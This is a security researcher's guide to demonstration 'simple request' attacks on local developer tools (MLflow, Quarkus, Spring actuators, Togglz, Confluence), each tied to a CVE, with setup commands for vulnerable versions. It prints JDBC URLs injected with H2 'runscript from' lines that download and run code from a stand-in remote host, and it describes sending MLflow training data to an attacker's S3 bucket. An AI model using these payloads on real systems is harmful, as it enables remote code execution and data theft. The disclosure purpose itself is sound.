Simple Request Vulnerabilities in the Developer Environment

Following the below guide and clicking on the payload link will trigger a RCE on your local machine. In all but one instance this will open the Calculator app. ( assuming you are using a Mac. ) Or for Confluence create a file in /tmp.


The repo https://github.com/JoeBeeton/simple-request-attacks contains sample codebases for the below vulnerabilities as well as a docker file to run the payloads locally.

MLFlow Data Exfiltration CVE-2023-43472


This vulnerability utilises the mlflow ui. by default bound to localhost:5000 Up until and including 2.8.1 it was possible to generate a simple request that modifies the extensions repository location to be a S3 bucket that the attacker controls. Once this is done any experiements run, would be uploaded to that S3 bucket. Leading to the attacker to have access to training data and ML Model saved in the python pickle format. Also as the model is saved in the pickle format and the attacker has control over it, it would be possible to create a python pickle serialization attack by modifying the model.pkl file.
This is done by first changing the name of the existing default extension. Then creating a new extension named Default and setting it's repository location to be a S3 bucket you control. The bucket would have to have global read and global write enabled to ensure that the mlflow instance is able to write to the bucket.

To Run :
Install mlflow 2.8.1
pip install mlflow==2.8.1
run mlflow ui
mlflow ui
Payload Link

Once clicked, you should be able to go to localhost:5000 and see that the Default extensions repository link is now named "s3://bucket-attacker-owns-thats-globally-writable/0" It sometimes takes a refresh of either the mlflow ui or the payload link to ensure the attack succeeds. If you want to see data actually exfiltrated you would need to modify the S3 bucket to be one you control and have the access rights set corrrectly ( global read and write ) Or see the screenshots in the write up
More details on how to configure and use MLFlow can be found at MLFlow Quickstart Guide

Quarkus RCE CVE-2022-4116


This vulnerability allows utilises the Dev UI which is available when the application is in Developer Mode. The Dev UI has the ability to modify application properties. Up until 2.14.2 it was possible to generate a simple request that modifies those properties and leverage that to execute arbitrary code in the target's JVM.
This is done by first setting the quarkus app's jdbc url to :
quarkus.datasource.jdbc.url=jdbc:h2:mem:testdb;INIT=runscript from 'https://github.bla:8081/exec.sql'
Then restarting the application so the change takes effect via the /restart actuator.
On startup, the Spring App will create a in memory H2 database and call out to http://somerandomsite.bla:8081/exec.sql to download the sql and execute it. This leverages a feature of the in memory H2 database to compile and execute a Java method which in turn opens the Calculator app.

To Run :
git clone https://github.com/JoeBeeton/simple-request-attacks.git
cd Simple-Requests/liquibase-quickstart
mvn quarkus:dev
Payload Link


Spring Cloud

This works because Spring Cloud V1 allowed the /env actuator to modify properties with a POST request with content type application/x-www-form-urlencoded. Allowing for a Simple Request attack.
This is done by first setting the spring app's jdbc url to :
spring.datasource.url=jdbc:h2:mem:testdb;INIT=runscript from 'http://somerandomsite.bla:8081/exec.sql'
Then restarting the application so the change takes effect via the /restart actuator.
On startup, the Spring App will create a in memory H2 database and call out to http://somerandomsite.bla:8081/exec.sql to download the sql and execute it. This leverages a feature of the in memory H2 database to compile and execute a Java method which in turn opens the Calculator app.

To Run :
git clone https://github.com/JoeBeeton/simple-request-attacks.git
cd Simple-Requests/spring-cloud-v1-vuln
mvn spring-boot:run
Payload Link


Togglz

This relies on the Togglz CSRF Vulnerability CVE-2020-28191.
A Simple Post Request can be made to hit localhost which modifies the feature toggle to execute arbitrary Java code via the Nashorn engine during toggle evaluation.

To Run :
git clone https://github.com/JoeBeeton/simple-request-attacks.git
cd Simple-Requests/spring-boot-hello-world-feature-enum
mvn spring-boot:run
Payload Link


Spring Actuator Shutdown

In Spring V2 actuators require a content-type of application/json. But when a post request does not have a message body, like with the /shutdown actuator, if no content-type is specified the actuator can still be triggered. So a Simple Post Request can be use to shutdown a Spring Boot app bound to localhost.

To Run :
git clone https://github.com/JoeBeeton/simple-request-attacks.git
cd Simple-Requests/spring-boot-hello-world-feature-enum
mvn spring-boot:run
Payload Link


Confluence CVE-2022-26134

This Confluence RCE relies on OGNL injection. As it is done via a Simple Get Request, it can be run via a Simple Request accessing localhost or an internal network that the victim has access to.

To Run :
git clone https://github.com/vulhub/vulhub.git
cd vulhub/confluence/CVE-2022-26134
docker-compose up
Payload Link